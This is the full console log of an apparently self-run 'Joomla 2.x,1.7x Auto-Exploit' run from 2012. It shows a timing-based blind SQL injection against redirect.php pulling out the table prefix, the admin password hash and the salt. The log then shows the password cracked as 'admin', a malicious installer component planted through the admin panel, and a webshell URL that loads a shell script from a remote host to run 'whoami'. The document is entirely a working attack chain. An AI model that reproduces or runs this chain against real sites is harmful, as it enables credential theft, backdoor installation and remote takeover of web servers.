[-------------------------------------------------------------------------] [ Joomla 2.x,1.7x Auto-Exploit ] [ Blind SQLi vs Redirect.php ] [ http://www.andrewmohawk.com/ ] [ @andrewmohawk ] [ ] [-------------------------------------------------------------------------] [+] Starting 2012-04-05 01:46:05 [+] Checking default time for requests.. 0.6027623017629 seconds [+] Setting timing attacks to 3 seconds [+] Determining length of prefix.. [-] Trying 1 [-] Trying 2 [-] Trying 3 [-] Trying 4 [-] Trying 5 [-] Found prefix length as 5 [+] Timing out database prefix.. [-] Found 99 (c) in 6 iterations... [-] Found 118 (v) in 6 iterations... [-] Found 53 (5) in 4 iterations... [-] Found 115 (s) in 6 iterations... [-] Found 119 (w) in 6 iterations... [+] Found database prefix as 'cv5sw' [+] Timing out admin hash.. [-] Found 102 (f) in 6 iterations... [-] Found 100 (d) in 6 iterations... [-] Found 50 (2) in 5 iterations... [-] Found 102 (f) in 6 iterations... [-] Found 101 (e) in 6 iterations... [-] Found 49 (1) in 6 iterations... [-] Found 48 (0) in 6 iterations... [-] Found 50 (2) in 5 iterations... [-] Found 50 (2) in 5 iterations... [-] Found 54 (6) in 5 iterations... [-] Found 53 (5) in 4 iterations... [-] Found 53 (5) in 4 iterations... [-] Found 48 (0) in 6 iterations... [-] Found 97 (a) in 7 iterations... [-] Found 50 (2) in 5 iterations... [-] Found 55 (7) in 5 iterations... [-] Found 52 (4) in 4 iterations... [-] Found 51 (3) in 4 iterations... [-] Found 52 (4) in 4 iterations... [-] Found 56 (8) in 4 iterations... [-] Found 102 (f) in 6 iterations... [-] Found 100 (d) in 6 iterations... [-] Found 48 (0) in 6 iterations... [-] Found 100 (d) in 6 iterations... [-] Found 50 (2) in 5 iterations... [-] Found 49 (1) in 6 iterations... [-] Found 101 (e) in 6 iterations... [-] Found 48 (0) in 6 iterations... [-] Found 52 (4) in 4 iterations... [-] Found 54 (6) in 5 iterations... [-] Found 98 (b) in 7 iterations... [-] Found 99 (c) in 6 iterations... [+] Admin hash: 'fd2fe10226550a274348fd0d21e046bc' [+] Timing out admin salt.. [-] Found 55 (7) in 5 iterations... [-] Found 90 (Z) in 5 iterations... [-] Found 65 (A) in 7 iterations... [-] Found 122 (z) in 5 iterations... [-] Found 105 (i) in 7 iterations... [-] Found 54 (6) in 5 iterations... [-] Found 72 (H) in 5 iterations... [-] Found 89 (Y) in 5 iterations... [-] Found 66 (B) in 7 iterations... [-] Found 85 (U) in 5 iterations... [-] Found 77 (M) in 5 iterations... [-] Found 87 (W) in 6 iterations... [-] Found 118 (v) in 6 iterations... [-] Found 119 (w) in 6 iterations... [-] Found 119 (w) in 6 iterations... [-] Found 101 (e) in 6 iterations... [-] Found 69 (E) in 6 iterations... [-] Found 121 (y) in 5 iterations... [-] Found 84 (T) in 6 iterations... [-] Found 90 (Z) in 5 iterations... [-] Found 74 (J) in 7 iterations... [-] Found 105 (i) in 7 iterations... [-] Found 75 (K) in 6 iterations... [-] Found 80 (P) in 7 iterations... [-] Found 56 (8) in 4 iterations... [-] Found 71 (G) in 6 iterations... [-] Found 48 (0) in 6 iterations... [-] Found 114 (r) in 5 iterations... [-] Found 98 (b) in 7 iterations... [-] Found 113 (q) in 6 iterations... [-] Found 76 (L) in 5 iterations... [-] Found 99 (c) in 6 iterations... [+] Admin salt: '7ZAzi6HYBUMWvwweEyTZJiKP8G0rbqLc' [+] Now cracking password to length 6.. [-] Length 1 [-] Length 2 [-] Length 3 [-] Length 4 [-] Length 5 [-] FOUND MATCH, password: admin [+] Pass found as 'admin' [+] Installing Component... [-] Setting up Curl vars..done. [-] pulling login page.. [-] logging in...done. [-] Browsing to admin page...done. [-] Browsing to installer page... http://www.andrewmohawk.com/joomla251/administrator//index.php?option=com_installerdone. [-] Installing component...done. [-] Verifying component install...installed! [+] RFI installed.. please visit the following to get a webshell: [+] http://www.andrewmohawk.com/joomla251//index.php?option=com_rfi&url=http://www.andrewmohawk.com/execShellSimple.txt&c=whoami [+] Total Requests made: 464 [+] Ended:2012-04-05 02:05:02